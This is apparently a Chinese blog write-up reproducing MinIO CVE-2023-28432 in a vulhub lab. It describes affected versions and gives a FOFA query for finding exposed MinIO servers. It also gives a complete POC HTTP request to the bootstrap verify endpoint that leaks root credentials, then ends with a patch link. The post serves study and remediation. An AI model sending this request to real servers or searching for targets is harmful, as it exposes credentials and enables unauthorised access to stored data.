vulhub之MinIO信息泄露漏洞(CVE-2023-28432)

文章目录

    • 0x01 前言
    • 0x02 漏洞描述
    • 0x03 影响范围
    • 0x04 漏洞复现
      • 1.启动环境
      • 2.查看端口
      • 3.构造POC
    • 0x05 修复建议

0x01 前言

本次测试仅供学习使用,如若非法他用,与本文作者无关,需自行负责!!!

0x02 漏洞描述

MinIO 是一款高性能、分布式的对象存储系统. 它是一款软件产品, 可以100%的运行在标准硬件。即X86等低成本机器也能够很好的运行MinIO。兼容亚马逊S3云存储服务接口,非常适合于存储大容量非结构化的数据,例如图片、视频、日志文件、备份数据和容器/虚拟机镜像等。

MinIO中存在一处信息泄露漏洞,由于Minio集群进行信息交换的9000端口,在未经配置的情况下通过发送特殊HPPT请求进行未授权访问,进而导致MinIO对象存储的相关环境变量泄露,环境变量中包含密钥信息(MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD),能看到对应权限的存储文件。

0x03 影响范围

RELEASE.2019-12-17T23-16-33Z <= MinIO < RELEASE.2023-03-20T20-16-18Z
(注意:MinIO漏洞利用的前提是其使用集群模式配置)

0x04 漏洞复现

1.启动环境

fofa:banner=“MinIO” || header=“MinIO” || title=“MinIO Browser”
vulhub之MinIO信息泄露漏洞(CVE-2023-28432)_第1张图片

Sudo docker-compose up -d

vulhub之MinIO信息泄露漏洞(CVE-2023-28432)_第2张图片

2.查看端口

Sudo docker ps

在这里插入图片描述

集群启动后,访问http://your-ip:9001可以查看Web管理页面,访问http://your-ip:9000是API服务。

vulhub之MinIO信息泄露漏洞(CVE-2023-28432)_第3张图片

注意:这个漏洞存在于API节点http://your-ip:9000/minio/bootstrap/v1/verify上

3.构造POC

POC

POST /minio/bootstrap/v1/verify HTTP/1.1
Host: your-ip:9000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

其他版本批量检测POC
https://github.com/MzzdToT/CVE-2023-28432/blob/main/minio.py

vulhub之MinIO信息泄露漏洞(CVE-2023-28432)_第4张图片可以看见,其中包含MINIO_ROOT_USER和MINIO_ROOT_PASSWORD。使用这个账号密码,即可成功登录管理后台。

vulhub之MinIO信息泄露漏洞(CVE-2023-28432)_第5张图片

0x05 修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://github.com/minio/minio/releases/tag/RELEASE.2023-03-20T20-16-18Z

你可能感兴趣的:(漏洞复现,系统安全,安全,安全架构,网络安全,web安全)